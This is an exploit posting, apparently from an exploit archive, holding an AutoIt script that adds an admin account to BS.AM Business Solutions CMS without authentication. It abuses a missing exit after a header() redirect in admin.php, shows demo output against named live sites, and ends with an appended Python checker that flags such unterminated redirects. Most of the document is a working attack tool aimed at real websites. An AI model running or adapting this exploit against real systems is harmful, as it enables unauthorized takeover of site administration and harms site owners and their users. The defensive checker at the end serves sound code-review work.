Business Solutions CMS Add Admin

Posted Jan 10, 2013
Authored by Akastep

Business Solutions CMS add administrator exploit that does not require authentication.

tags | exploit
SHA-256 | fa6b20834c1535c6a89139a7f3194efde7fe3bb133b1ffaf7e80a747ce527856

#cs
1337day.com >> Exploit database separated by exploit type (local, remote, DoS, etc.)
[+] Site : 1337day.com
[+] Support e-mail : submit[at]1337day.com
I'm AkaStep member from Inj3ct0r Team

bs_am_remote_add_admin.au3


BS.AM (BUSINESS SOLUTIONS) CMS REMOTE ADD ADMIN EXPLOIT.
THIS IS AN EXPLOIT WRITTEN IN THE AUTOIT SCRIPTING/PROGRAMMING LANGUAGE.
ON SUCCESSFUL REMOTE EXPLOITATION IT WILL ADD A NEW ADMIN TO THE TARGET SITE.

***** THIS IS A WHOLE EXPLOIT! *****
THANK YOU!

FEW DEMOS:

http://asba.am
http://doors.am



DEMO USAGE:

>poc.exe http://asba.am bigbang bigbang


##############################################################
(BS.AM Business Solutions CMS) REMOTE ADD ADMIN EXPLOIT(priv8)
Usage: poc.exe http://site.tld username password
[*] DON'T HATE FROM HACKER, HATE YOUR OWN CODE! [*]
[@@@] Vuln & Exploit By AkaStep [@@@]
##############################################################
[+] GETTING INFO ABOUT CMS [+]
[*] GOT Response : Yes! It is exactly that we are looking for! [*]

##################################################
Trying to add new admin:
To Site:www.asba.am
With Username: bigbang
With Password: bigbang
##################################################

##################################################
Exploit Try Count:1
##################################################
Error Count: 0
##################################################

##################################################
Exploit Try Count:2
##################################################
Error Count: 0
##################################################
Count of errors during exploitation : 0

##################################################
[*] Seems we are going to travel xD. [*]
Try to login @
Site: asba.am/cms/index.php
With Username: bigbang
With Password: bigbang
##################################################
[*] Exit [*]
##################################################








VULNERABLE CODE:
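NOTICE: the script continues its execution because exit; is missing after header();
header() only queues the Location response header, so the rest of admin.php still runs for a visitor who is not logged in.
FUNNY TO SEE HOW MANY PROGRAMMERS FAIL TO UNDERSTAND THIS ;)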

//cms/admin.php

============SNIP BEGINS============
<?
session_start();
if ($_SESSION['login11_error'] != "no")
header("Location: index.php");
include 'config.php';?>
<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>cms::</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<link rel="stylesheet" type="text/css" href="css/main.css" />
<script type="text/javascript" src="javascript/jquery-1.4.2.js"></script>

<script type="text/javascript" src="javascript/admin.js"></script>
<script type="text/javascript" src="javascript/jquery-ui-1.8.11.custom.min.js"></script>
<script type="text/javascript" src="javascript/jquery.ui.datepicker-hy.js"></script>

<script type="text/javascript" src="javascript/jquery.lightbox-0.5.js"></script>
<link type="text/css" href="css/jquery-ui-1.8.11.custom.css" rel="stylesheet" />
</head>
<body>
<div id="header">

============SNIP ENDS HERE===========



#ce
#Region ;**** Directives created by AutoIt3Wrapper_GUI ****
#AutoIt3Wrapper_UseUpx=n
#AutoIt3Wrapper_Change2CUI=y
#EndRegion ;**** Directives created by AutoIt3Wrapper_GUI ****
#NoTrayIcon
#include "WinHttp.au3"
#include <inet.au3>
#include <String.au3>

$exploitname=@CRLF & _StringRepeat('#',62) & @CRLF & _
'(BS.AM Business Solutions CMS) REMOTE ADD ADMIN EXPLOIT(priv8) ' & @CRLF & _
'Usage: ' & @ScriptName & ' http://site.tld ' & ' username ' & 'password ' & _
@CRLF & "[*] DON'T HATE FROM HACKER, HATE YOUR OWN CODE! [*]" & @CRLF & _
'[@@@] Vuln & Exploit By AkaStep [@@@]' & @CRLF & _StringRepeat('#',62);
ConsoleWrite(@CRLF & $exploitname & @CRLF)

$method='POST';
$vulnurl='cms/admin.php?lang=en&page=security';
Global $count=0,$error=0;
$cmsindent='CaptchaSecurityImages.php';
$adminpanel='/cms/index.php';

if $CmdLine[0] <> 3 Then
MsgBox(64,"","Command Line Plizzzz => " & @CRLF & "Usage: " & @ScriptName & ' http://www.site.tld ' & ' username ' & 'password' & @CRLF);
exit;
EndIf


if $CmdLine[0]=3 Then
$targetsite=$CmdLine[1];
$username=$CmdLine[2];
$password=$CmdLine[3];
EndIf



if StringStripWS($targetsite,8)='' OR StringStripWS($username,8)='' OR StringStripWS($password,8)='' Then
ConsoleWrite('Are you kidding me?');
Exit;
EndIf



$doublecheck=InetGet($targetsite,'',1);
if @error Then
ConsoleWrite('[*] Are you sure that site exist? Theris an error! Please Try again! [*]' & @CRLF)
Exit;
EndIf


ConsoleWrite('[+] GETTING INFO ABOUT CMS [+] ' & @CRLF);
sleep(Random(1200,2500,1));




$sidentify=_INetGetSource($targetsite & $adminpanel,True);




if StringInStr($sidentify,$cmsindent) Then
ConsoleWrite("[*] GOT Response : Yes! It is exactly that we are looking for! [*]" & @CRLF)
Else
ConsoleWrite("[*] IDENTIFICATION RESULT IS WRONG!. Anyway,forcing to try exploit it. [*]" & @CRLF)
$error+=1;
EndIf




$targetsite='www.' & StringReplace(StringReplace($targetsite,'http://',''),'/','')


priv8($targetsite,$username,$password,$count,$error);#~ do magic for me plizzz));~#

Func priv8($targetsite,$username,$password,$count,$error)


$count+=1;


Global $sAddress = $targetsite

$triptrop=@CRLF & _StringRepeat('#',50) & @CRLF;
$whatcurrentlywedo=$triptrop & 'Trying to add new admin: ' & @CRLF & 'To Site:' & $targetsite & @CRLF & 'With Username: ' & _
$username & @CRLF & 'With Password: ' & $password & $triptrop;
if $count <=1 then ConsoleWrite($whatcurrentlywedo)

$doitnicely=$triptrop & 'Exploit Try Count:' & $count & $triptrop & 'Error Count: ' & $error & $triptrop;
ConsoleWrite($doitnicely);
Global $sPostData = "username=" & $username & "&password=" & $password & "&rewrite_password=" & $password & "&ifsubmit=yes";


if $error>=2 OR $count>=2 Then
ConsoleWrite('Count of errors during exploitation : ' & $error & @CRLF)

if int($error)=0 then
ConsoleWrite($triptrop & '[*] Seems we are going to travel xD. [*]' & _
@CRLF & 'Try to login @ ' & @CRLF & _
'Site: ' & $targetsite & $adminpanel & @CRLF &'With Username: ' & _
$username & @CRLF & 'With Password: ' & $password & $triptrop & '[*] Exit [*]' & $triptrop);
exit;
Else

ConsoleWrite($triptrop & '[*] Seems Is not exploitable or Vuln Fixed? [*]' & @CRLF & _
'[*] Anyway,try to login with new credentials. [*]' & @CRLF & _
'[*] May be you are Lucky;) [*]' & _
@CRLF & 'Try to login @ ' & @CRLF & _
'Site: ' & $targetsite & $adminpanel & @CRLF & _
'With Username: ' & $username & @CRLF & 'With Password: ' & $password & $triptrop & '[*] Exit [*]' & $triptrop);

EndIf
exit;

EndIf



Global $hOpen = _WinHttpOpen("Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4325)");


Global $hConnect = _WinHttpConnect($hOpen, $sAddress)


Global $hRequest = _WinHttpOpenRequest($hConnect,$method,$vulnurl,Default,Default,'');







_WinHttpAddRequestHeaders($hRequest, "Accept-Language: en-us,en;q=0.5")
_WinHttpAddRequestHeaders($hRequest, "Accept-Encoding: gzip, deflate")
_WinHttpAddRequestHeaders($hRequest, "DNT: 1")
_WinHttpAddRequestHeaders($hRequest, "Keep-Alive: 300")
_WinHttpAddRequestHeaders($hRequest, "Connection: keep-alive")
_WinHttpAddRequestHeaders($hRequest, "Content-Type: application/x-www-form-urlencoded")
_WinHttpAddRequestHeaders($hRequest, "Content-Length: " & StringLen($sPostData));






_WinHttpSendRequest($hRequest, -1, $sPostData)

_WinHttpReceiveResponse($hRequest)

Global $sHeader, $sReturned
If _WinHttpQueryDataAvailable($hRequest) Then
$sHeader = _WinHttpQueryHeaders($hRequest)
Do
$sReturned &= _WinHttpReadData($hRequest)
Until @error

_WinHttpCloseHandle($hRequest)
_WinHttpCloseHandle($hConnect)
_WinHttpCloseHandle($hOpen)

$targetsite=StringMid($targetsite,5,StringLen($targetsite))
Sleep(1500);
priv8($targetsite,$username,$password,$count,$error);

Else
$error+=1

_WinHttpCloseHandle($hRequest)
_WinHttpCloseHandle($hConnect)
_WinHttpCloseHandle($hOpen)

$targetsite=StringMid($targetsite,5,StringLen($targetsite))
Sleep(1500);
priv8($targetsite,$username,$password,$count,$error);#~double check anyway.;~#

EndIf

EndFunc;=> priv8();


#cs

================================================
KUDOSSSSSSS
================================================
packetstormsecurity.org
packetstormsecurity.com
packetstormsecurity.net
securityfocus.com
cxsecurity.com
security.nnov.ru
securtiyvulns.com
securitylab.ru
secunia.com
securityhome.eu
exploitsdownload.com
osvdb.com
websecurity.com.ua
1337day.com

to all Aa Team + to all Azerbaijan Black HatZ
+ *Especially to my bro CAMOUFL4G3 *
To All Turkish Hackers

Also special thanks to: ottoman38 & HERO_AZE
================================================

/AkaStep

#ce
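
A static check for the flaw described under VULNERABLE CODE above, as an added example that is not part of the original advisory or its author's code: it flags every `header("Location: ...")` call in PHP source that is not immediately followed by `exit`/`die`. The function name and both embedded PHP samples are constructed for illustration; `FIXED` assumes one way of making the guard terminal (strict comparison plus `exit;`).

```python
import re

# Constructed sample: the guard from cms/admin.php as quoted on this page.
VULNERABLE = """<?
session_start();
if ($_SESSION['login11_error'] != "no")
header("Location: index.php");
include 'config.php';?>
"""

# Constructed sample: the same guard with the redirect made terminal.
FIXED = """<?php
session_start();
if (!isset($_SESSION['login11_error']) || $_SESSION['login11_error'] !== "no") {
    header("Location: index.php");
    exit;
}
include 'config.php';
"""

REDIRECT = re.compile(r"""\bheader\s*\(\s*['"]\s*Location\s*:""", re.I)
# Whitespace and PHP comments that may sit between the redirect and exit/die.
SKIP = re.compile(r"(?:\s+|//[^\n]*|#[^\n]*|/\*.*?\*/)*", re.S)
TERMINATOR = re.compile(r"(?:exit|die)\b", re.I)


def find_unterminated_redirects(php_source):
    """Return 1-based line numbers of Location redirects not followed by exit/die.

    Heuristic: the statement is assumed to end at the first ';' after the
    call, so a ';' inside the redirect URL would need a real PHP parser.
    """
    findings = []
    for match in REDIRECT.finditer(php_source):
        end = php_source.find(";", match.end())
        if end == -1:  # statement closed by '?>' or file truncated
            end = len(php_source) - 1
        rest_start = SKIP.match(php_source, end + 1).end()
        if not TERMINATOR.match(php_source, rest_start):
            findings.append(php_source.count("\n", 0, match.start()) + 1)
    return findings


if __name__ == "__main__":
    for name, src in (("vulnerable", VULNERABLE), ("fixed", FIXED)):
        print(name, find_unterminated_redirects(src))
```

A finding marks a page whose body keeps executing after the redirect, so every handler reachable from that file should also be reviewed for its own authorization check.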